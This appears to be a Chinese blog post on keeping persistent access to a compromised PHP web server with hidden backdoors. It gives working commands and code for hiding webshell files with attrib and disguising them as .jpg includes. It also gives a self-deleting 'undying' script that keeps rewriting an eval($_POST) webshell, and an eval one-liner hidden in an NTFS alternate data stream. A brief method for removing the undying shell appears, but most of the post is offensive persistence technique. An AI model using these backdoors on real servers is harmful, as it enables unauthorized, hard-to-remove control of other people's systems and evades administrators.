维持权限之隐藏后门

2020-03-12  本文已影响0人  migrate_
  1. 隐藏后门文件
attrib +s +h 222.php //文件名
attrib +s +a +r +h 222.php //文件名
1.png

查看隐藏后的文件

dir /a:h
2.png
  1. 文件包含
    首先一个文件include.php,内容
<?php
 include("phpinfo".".jpg")
?>

在创建一个phpinfo.jpg,内容

<?php
 phpinfo(); 
?>
3.png

这个方法不能算隐藏文件,为了增强效果可以把文件名字起的比较像正常文件比如:

login.php
logout.php
email.class.php
upload_file.php

再不行就采用第一种方法把include.php隐藏起来,两种方法结合

  1. 不死马
    运行后,会删除自身,生成一个webshell.php,管理员删除后还会生成。
<?php  
    set_time_limit(0);  
    ignore_user_abort(1);  
    unlink(__FILE__);  
    while(1){  
        file_put_contents('webshell.php','<?php @eval($_POST["password"]);?>');  
        sleep(5);  
    }
4.png
解决不死马,覆盖重写,创建个clear.php或者重启服务再删除
<?php  
    set_time_limit(0);  
    ignore_user_abort(1);  
    unlink(__FILE__);  
    while(1){  
        file_put_contents('webshell.php','clear');  
        sleep(1);  
    }
5.png
  1. 利用ADS隐藏webshell
    在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg

这样子就生成了一个不可见的shell,hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。
问题1:如何查看index.php:hidden.jpg内容呢?
进入文件所在目录

notepad index.php:hidden.jpg
或者
dir /r

问题2:如何删除index.php:hidden.jpg?
直接删除index.php即可


6.png

然后用一个正常文件里把这个ADS文件include进去

<?php include(‘index.php:hidden.jpg’)?>

这样子就可以正常解析我们的一句话了。


7.png
上一篇 下一篇

猜你喜欢

热点阅读